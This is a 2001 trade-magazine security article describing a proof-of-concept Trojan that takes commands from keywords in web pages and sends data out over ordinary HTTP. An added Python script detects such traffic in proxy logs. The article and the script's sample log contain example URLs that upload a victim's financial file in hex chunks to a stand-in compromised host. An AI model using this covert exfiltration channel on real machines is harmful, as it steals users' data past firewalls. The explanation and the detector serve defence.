Security
FEATURE
No Desktop is an Island

  November 12, 2001
  By Michael J. DeMaria

Online Only: How Trojan Viruses Work -- A New Wrinkle

Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.

On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.

The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP GET request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it. For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage are available at nwc.syr.edu/~mdemaria/sheepshank.

While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=AAD3B4351404EE" and just have a CGI script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully, and change some of the command strings, then intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.
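Even though every request in the chunked upload above is valid HTTP, a proxy log still shows a pattern a person browsing does not produce: one client hitting the same host and path in a tight loop with hex-only query values. The script below, an added example that is not part of the article or of Sheepshank, runs that check over a constructed proxy log in a made-up format (timestamp, client, method, URL); the hostnames, addresses and payload values are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log (timestamp, client, method, URL); not from the article.
SAMPLE_LOG = """\
2001-11-12T09:00:00 10.0.0.5 GET http://www.example.com/index.html
2001-11-12T09:00:30 10.0.0.5 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=AAD3B4351404EE
-- proxy restarted --
2001-11-12T09:01:00 10.0.0.5 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=0F1E2D3C4B5A6978
2001-11-12T09:01:30 10.0.0.5 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=DEADBEEF00112233
2001-11-12T09:02:00 10.0.0.5 GET http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=44556677889900AA
2001-11-12T09:02:15 10.0.0.7 GET http://www.example.com/search?q=firewall
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d) (\S+) (\S+) (\S+)$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

def find_chunked_uploads(log_text, min_hits=3, min_hex_len=8):
    """Group GETs per (client, host, path) whose query carries a hex value of
    min_hex_len+ chars; report groups with min_hits+ requests, bytes carried
    out, and whether requests are evenly spaced (a loop, not a person)."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(3) != "GET":
            continue  # malformed line or non-GET request
        ts, client, _, url = m.groups()
        parts = urlsplit(url)
        hex_values = [v for vals in parse_qs(parts.query).values() for v in vals
                      if len(v) >= min_hex_len and HEX_RE.match(v)]
        if not hex_values:
            continue
        # Two hex characters encode one byte of the exfiltrated file.
        groups[(client, parts.hostname, parts.path)].append(
            (datetime.fromisoformat(ts), sum(len(v) // 2 for v in hex_values)))
    findings = []
    for (client, host, path), hits in groups.items():
        if len(hits) < min_hits:
            continue
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        findings.append({"client": client, "host": host, "path": path,
                         "requests": len(hits), "bytes_out": sum(n for _, n in hits),
                         "regular": max(gaps) - min(gaps) <= 5.0})
    return findings
```

On the sample log, `find_chunked_uploads(SAMPLE_LOG)` flags only the 10.0.0.5 to www.compromised.comp loop (four requests, 31 bytes out, evenly spaced); the thresholds are starting points to tune against your own proxy traffic.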

What's the solution? Well, you must go beyond port blocking and intrusion detection, and that next step is application control. You should specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity; otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by computing an MD5 hash of the executable -- if the executable is modified, the hashes won't match up.
